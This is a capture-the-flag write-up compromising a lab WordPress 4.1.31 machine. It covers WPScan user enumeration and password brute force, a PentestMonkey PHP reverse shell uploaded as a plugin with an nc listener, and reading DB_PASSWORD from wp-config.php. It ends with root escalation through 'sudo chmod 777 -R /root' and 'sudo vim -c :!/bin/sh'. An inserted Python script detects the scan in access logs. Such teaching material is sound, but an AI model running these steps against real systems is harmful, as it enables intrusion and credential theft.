# Write-up

### <mark style="color:purple;">Objectives</mark>

The objective is to capture both the user and root flags, demonstrating a complete system compromise.

***

### <mark style="color:purple;">Reconnaissance</mark>

We start by performing a port scan using Nmap:

```bash
sudo nmap -sCV -F -T5 <url>
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXesdvBaidPAo8ytNFX6i9-MgeUp5Df2khR5h38FAPsioIJKcHhf1ZFHO5XGsqpBIpxI2o20S3ZAFq7d4YxlcnSx1jKByfs03SKTbuJ_LLqUOUBzNITJSFNJHuzMDmnnz_o4MA5Cig?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

We can see that **WordPress 4.1.31** is running on port 80.

Using <mark style="color:blue;">**WPScan**</mark> to enumerate users:

```bash
wpscan --url http://10.10.70.7 --enumerate u
```

We find the following usernames: `hugo`, `c0ldd`, and `phillip`.

Next, we perform a brute-force attack with WPScan:

```bash
wpscan --url http://10.10.70.7/ --usernames hugo,c0ldd,phillip --passwords /usr/share/wordlists/rockyou.txt
```

After a few attempts, we successfully obtain the password for the user `c0ldd`.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdXa1KSoAa9JFCPYPGQOgmxnuWKx6uRkZEDSks_xFyNNncqVPIsmFZxXa9f-bDGM2d0NQA7z-EEWw-Dcjur-iHO_5che9XCrssq4Fd1BWy04wIYSKFW_h6G7qUhD40A7-4-3PuGeA?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt=""><figcaption></figcaption></figure>
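The WPScan user enumeration and password attack above leave a distinctive trail in the web server's access log: a walk through `/?author=1`, `/?author=2`, ... followed by a burst of POSTs to `wp-login.php`. As an added example (not part of the original write-up), the following Python script flags both patterns over a few constructed Apache log lines; the thresholds and client IP addresses are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Thresholds are assumptions for this example; tune them to the site's normal traffic.
AUTHOR_PROBE_MIN = 3   # distinct ?author=N values requested by one client
LOGIN_POST_MIN = 10    # POSTs to wp-login.php from one client


def analyse(lines):
    # Returns sorted (ip, finding, count) tuples for clients matching either pattern.
    author_ids = defaultdict(set)
    login_posts = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip, method, path = m["ip"], m["method"], m["path"]
        # WPScan's user enumeration walks /?author=1, /?author=2, ...
        probe = re.search(r"[?&]author=(\d+)", path)
        if probe:
            author_ids[ip].add(probe.group(1))
        # The password attack is a burst of POSTs to the login form.
        if method == "POST" and path.startswith("/wp-login.php"):
            login_posts[ip] += 1
    findings = []
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_PROBE_MIN:
            findings.append((ip, "user-enumeration", len(ids)))
    for ip, n in login_posts.items():
        if n >= LOGIN_POST_MIN:
            findings.append((ip, "login-brute-force", n))
    return sorted(findings)


# Constructed sample log: one scanning client and one ordinary visitor.
SAMPLE_LOG = (
    [f'10.10.14.5 - - [10/Mar/2024:12:00:0{i} +0000] "GET /?author={i} HTTP/1.1" 301 0'
     for i in range(1, 4)]
    + [f'10.10.14.5 - - [10/Mar/2024:12:01:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3420'
       for i in range(12)]
    + ['192.168.1.20 - - [10/Mar/2024:12:02:00 +0000] "GET /index.php HTTP/1.1" 200 8192']
)

if __name__ == "__main__":
    for ip, finding, count in analyse(SAMPLE_LOG):
        print(f"{ip}: {finding} ({count} events)")
```

Feeding the real `access.log` to `analyse()` (one line per list element) is enough to spot this kind of scan after the fact; rate limiting or lockout on `wp-login.php` stops it in the first place.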

***

### <mark style="color:purple;">Gaining a Shell</mark>

Now, we access the WordPress admin panel and go to the **Plugins** section to manually upload a plugin.

We upload a plugin that contains a reverse shell script, such as the **PentestMonkey** PHP reverse shell, edited with our IP and port values.

Once uploaded, we access it via:

```text
http://<url>/wp-content/uploads/<year>/<month>/
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXd44xvvxUHjl657_HO1TMqfIzV3vU6_lfyDuFbgyF7TgleXvV6iSkoZ1LjFTi6TB4Wr8qxoq329JrUaQqJ_jQfwykkXR4y2HvkKvsQqlHhBW23FaGfeGOATWhgjwhKTuWqovGJzAQ?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

Before executing the reverse shell, we set up a listener on our machine:

```bash
nc -lnvp <port>
```

Then, we trigger the uploaded script to receive the shell.

To upgrade the shell, we use:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Running `whoami`, we confirm we are `www-data`.

Our next step is to find the user flag:

```bash
find / -type f -name "user.txt" 2>/dev/null
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXeM_EqzVHvMeXrQX1kFcjtVaHMGt6yTKv99sbwcY-iEgEhUruLXt58M_nurbqqg4TTBOzIEZa1RUB4Ii5yP0Q67baeyCZ--e56iK_1IhstRS5bP3tOZxlSZ2Ua4KIXC0ig6z61Jsw?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

However, we can't read the file due to permission restrictions, so we need access to the `c0ldd` user.

We check the WordPress config file for database credentials:

```bash
grep "DB_PASSWORD" /var/www/html/wp-config.php
```

The database password turns out to be reused as the login password for `c0ldd`.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXe1oQI0hqAFdBA1Sk6ZZuiCSYJbyzgoM_kD5uW2JLrF27xCBy72VsBIFPLW-uzdXEljvWZ6Qh7-WCODuF_CA-oYnk3mAFm2c2eRZGYf49HA7q4Zu6Unb8RL8SKdS6IN9f9zMtAm?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

Then we switch user:

```bash
su c0ldd
```

Now we can read the `user.txt` flag. The file content is base64-encoded; decoding it with `base64 --decode` yields a congratulatory message.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXeN0OklFo2RA1m_NMD4QxUIjPRpCB6Yzon9FcUTVFFFtg4xPeS0_dgxlmgk4WRspO_TL3VrtLFuIAQ36MwwGn_4aTAhFJlKPyG27KK1o3IxrnxZ9sOxwe1PLpOhmQuhGx3B7KxaTQ?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

Next, we look for `root.txt`:

```bash
find / -type f -name "root.txt" 2>/dev/null
```

Again, we lack permission to read the file — so we need to escalate privileges to `root`.

***

### <mark style="color:purple;">Privilege Escalation</mark>

Using `sudo -l`, we see that we can run `vim`, `chmod`, and `ftp` as root. The quickest escalation path is `chmod`, although note that it recursively rewrites the permissions of everything under `/root`, whereas the `vim` method further down leaves the filesystem unchanged:

```bash
sudo chmod 777 -R /root
cat /root/root.txt
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXen0q7-nGI5wTGINvWRRYyRs2KZ07UNwKS0ADM3489IIGTGAGgIQwrMPih_qeNKc_07ue1PTKABvYRadIKVB1AXTbNSDHlFznOjPmxN5P4bUFKdvc9OmCCMTP2e4vUzoCmZMe72?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

As an alternative method, we can escalate using `vim`:

```bash
sudo vim -c ':!/bin/sh'
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-e0ywzVezy-yRg_St5KJnsqps_bgUCMCxs7PwYKierOu7gxorv9GIbXMZcAB4KMtPWBLoEkuQ3eufTinXlv-sIOfH6j69RSWz8it3DXzxz9fjN9beOYeOboRBduTpsd4kCljzLQ?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

And that's it — machine completed.
